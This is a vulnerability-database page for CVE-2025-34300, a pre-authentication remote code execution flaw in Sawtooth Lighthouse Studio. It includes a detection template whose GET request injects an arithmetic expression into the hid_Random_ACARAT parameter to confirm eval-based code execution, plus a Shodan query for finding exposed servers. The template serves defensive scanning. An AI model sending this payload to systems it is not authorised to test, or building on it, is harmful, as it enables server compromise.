| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
| CVE-2025-34300 | 16 Jul 202512:57 | – | attackerkb | |
| The vulnerability of the ciwweb.pl script, a software used for creating and conducting surveys with Lighthouse Studio, allows a perpetrator to execute arbitrary code. | 31 Jul 202500:00 | – | bdu_fstec | |
| CVE-2025-34300 | 16 Jul 202512:25 | – | circl | |
| Sawtooth Lighthouse Studio 安全漏洞 | 16 Jul 202500:00 | – | cnnvd | |
| CVE-2025-34300 | 16 Jul 202512:57 | – | cve | |
| CVE-2025-34300 Sawtooth Software Lighthouse Studio < 9.16.14 Pre-Authentication RCE | 16 Jul 202512:57 | – | cvelist | |
| EUVD-2025-21694 | 16 Jul 202512:57 | – | euvd | |
| Exploit for CVE-2025-34300 | 1 Sep 202514:06 | – | githubexploit | |
| Template Injection Vulnerability in Sawtooth Software's Lighthouse Studio (CVE-2025-34300) | 9 Sep 202518:55 | – | metasploit | |
| CVE-2025-34300 | 16 Jul 202513:15 | – | nvd |
id: CVE-2025-34300
info:
name: SawtoothSoftware Lighthouse Studio < 9.16.14 - Pre-Auth Remote Code Execution
author: assetnote,DhiyaneshDK,iamnoooob
severity: critical
description: |
A pre-authentication remote code execution vulnerability exists in Sawtooth Software’s Lighthouse Studio versions prior to 9.16.14. The issue arises from the unsafe use of the `eval` function within the Perl CGI component `ciwweb.pl`, where attacker-supplied input inside `hid_Random_ACARAT` is directly passed to `eval`. This allows remote unauthenticated attackers to execute arbitrary Perl code on the server.
impact: |
Unauthenticated attackers can execute arbitrary Perl code through the hid_Random_ACARAT parameter due to unsafe eval usage, achieving complete server compromise.
remediation: |
Upgrade to Sawtooth Software Lighthouse Studio version 9.16.14 or later that removes unsafe eval usage in ciwweb.pl.
reference:
- https://slcyber.io/assetnote-security-research-center/rce-in-the-most-popular-survey-software-youve-never-heard-of/
- https://sawtoothsoftware.com/resources/software-downloads/lighthouse-studio
- https://nvd.nist.gov/vuln/detail/CVE-2025-34300
classification:
epss-score: 0.4942
epss-percentile: 0.98757
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-34300
cwe-id: CWE-1336,CWE-20
metadata:
verified: true
max-request: 1
shodan-query: html:"Lighthouse Studio"
tags: cve,cve2025,lighthouse-studio,sawtoothsoftware,rce,ssti,vkev,vuln
variables:
num1: "{{rand_int(40000, 44800)}}"
num2: "{{rand_int(40000, 44800)}}"
result: "{{to_number(num1)*to_number(num2)}}"
http:
- raw:
- |
GET /cgi-bin/ciwweb.pl?hid_javascript=1&hid_Random_ACARAT=[%25{{num1}}*{{num2}}%25]&hid_Random_ACARAT=x HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'name="hid_Random_ACARAT" value="{{result}}"'
- type: status
status:
- 200
# digest: 4b0a00483046022100c1a79ca231f27cc3576b092089e8c0f56d38850d753b952824fc45551086bfd3022100cfacd2a7b902d990a5d94139dfe8bcd8d05690dd7ca651b3366a7992a8c9e44f:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation